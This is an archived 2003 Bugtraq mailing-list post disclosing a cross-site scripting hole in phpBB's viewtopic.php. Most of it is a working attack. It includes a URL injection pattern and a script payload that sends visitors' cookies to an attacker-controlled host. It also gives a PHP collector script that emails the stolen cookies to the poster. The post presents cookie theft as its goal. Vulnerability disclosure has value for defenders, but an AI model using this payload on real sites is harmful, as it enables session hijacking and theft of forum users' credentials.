105648 2003-06-23  22:43  /45 rader/ silent needle <silentneedle@hotmail.com>
Importerad: 2003-06-23  22:43  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <5300>
Ärende: XSS Exploit In phpBB viewtopic.php
------------------------------------------------------------


XSS Exploit In phpBB viewtopic.php

A: BACKGROUND [from phpbb.com] phpBB is a high powered, fully
scalable, and highly customisable open- source bulletin board
package. phpBB has a user-friendly interface, simple  and
straightforward administration panel, and helpful FAQ. Based on the
powerful PHP server language and your choice of MySQL, MS-SQL,
PostgreSQL  or Access/ODBC database servers, phpBB is the ideal free
community  solution for all web sites.

B: DESCRIPTION The cross site scripting allow you to print a html or
javascript or others  in the webpage when it just open not write in
the page.

C: EXPLOIT
This is the URLs of the exploit:
http://[site]/phpBB/viewtopic.php?topic_id=[script]

And you can steal cookie by changing [script] to
<script>document.location='http://any-web-
site/cookies.php?'+document.cookie</script>
and in http://any-web-site/cookie.php put
----------------cookie.php-------------------
<?
mail("silentneedle@hotmail.com","cookies from phpbb",$http_cookie);
echo $http_cookie; //or you can send with the variable name
?>
-----------------------------------------------

D: GREETZ To : SP.IC , DR^^FUNNY , ARAB-HAK , ZALABOZA , 7azm , King
Of Ray , OH SHE  IS A LITTLE RUN AWAY[puretone & kelly osbourne] :)
and thanks to the last exploit in phpbb :)

E: CONTACT
Silent Needle
silentneedle@hotmail.com

F: OH LONG NIGHT
Bye
(105648) /silent needle <silentneedle@hotmail.com>/(Ombruten)